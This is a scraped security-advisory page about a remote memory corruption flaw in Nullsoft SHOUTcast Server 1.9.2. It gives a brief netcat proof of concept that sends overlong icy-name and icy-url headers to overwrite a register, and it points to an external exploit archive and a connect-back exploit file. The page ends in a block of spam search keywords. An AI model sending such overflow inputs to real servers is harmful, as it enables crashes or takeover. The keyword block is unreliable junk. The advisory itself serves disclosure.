about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Nullsoft SHOUTcast icy-name/icy-url Memory Corruption Vulnerability


Title Nullsoft SHOUTcast icy-name/icy-url Memory Corruption Vulnerability
Published 2003-11-03-12:00AM
Updated 2004-03-04-04:43PM
Class Boundary Condition Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this issue is credited to HEX <hex@hex_net_ru.securityfocus.com>.
Vulnerable  NullSoft Shoutcast Server 1.9.2 Win32
Not Vulnerable  
Code   The following proof-of-concept example was provided:

>nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB[rewrite EAX]
icy-genre:DoS radio
icy-url:AAA...[Ax288]BBBB[rewrite EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160

---
A proof of concept exploit has been made available. It should be noted that Symantec has not verified the integrity of this file. The proof of concept is available at the following location:
http://www.securitylab.ru/_tools/shoutdown.01.tar.gz

exworm of oseen has provided the following connect back exploit, oseen_shoucast.c.

The following exploit code has been provided: /data/vulnerabilities/exploits/shoutexp.py /data/vulnerabilities/exploits/oseen_shoucast.c
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 06:12:51 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo www.gamemm sexy vedi Www.Sex ve www.gzcarp www.net.xx www.js008. php 1.3.26 mambo Remo agricultur www.thehon serv-u ftp www.trish Www.Sex ve cad.firm36 maxcpm.inf Crack+Data Masala mix maxcpm.inf news for c webcal www.zjnbzs www.trish ms04031 Gaya dog s www.superw www.worl shopadbtes php-nuke 2 poranol Tamil actr Www.free+t http// tri gzxingy168 bignatural news for c Sex in USA LESBEANS free teenp wwwwwww89 lo395l news for c router pas www.871545 200 /compo angelina j www.54xiak Invision www.nemu.p guest book